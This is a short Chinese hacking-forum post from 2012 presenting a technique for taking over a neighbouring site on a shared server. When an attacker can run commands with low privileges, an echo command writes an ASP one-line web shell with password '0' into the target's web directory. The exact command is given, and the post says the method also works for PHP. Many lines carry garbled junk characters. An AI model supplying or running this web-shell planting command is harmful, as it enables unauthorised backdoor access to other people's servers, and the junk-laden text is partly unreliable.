在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
) c. V& M+ M. K# J5 r# f7 G0 S& V% b! l L- k" ~8 e
命令格式4 _; G( q' i% T8 q# u1 O8 S8 U/ Z
0 |7 @% x7 ?7 R2 x' [, q5 rEcho 语句 >目标站绝对目录$ _2 J/ G- P$ B. m" |. y
1 T; B% b7 V2 x. Y! p% M! b1 k
例如:
- O/ Q$ J8 w) {7 o" G
% ^0 A, [5 X$ h9 M6 q" ^3 Necho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
1 l# P4 y( q. J" t- j+ u ?2 v- P4 b3 \5 E* G$ T' g% v! `
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 f, H# X% s' l' H/ x6 F |
发表于 2012-9-23 14:40:24
收藏
支持
反对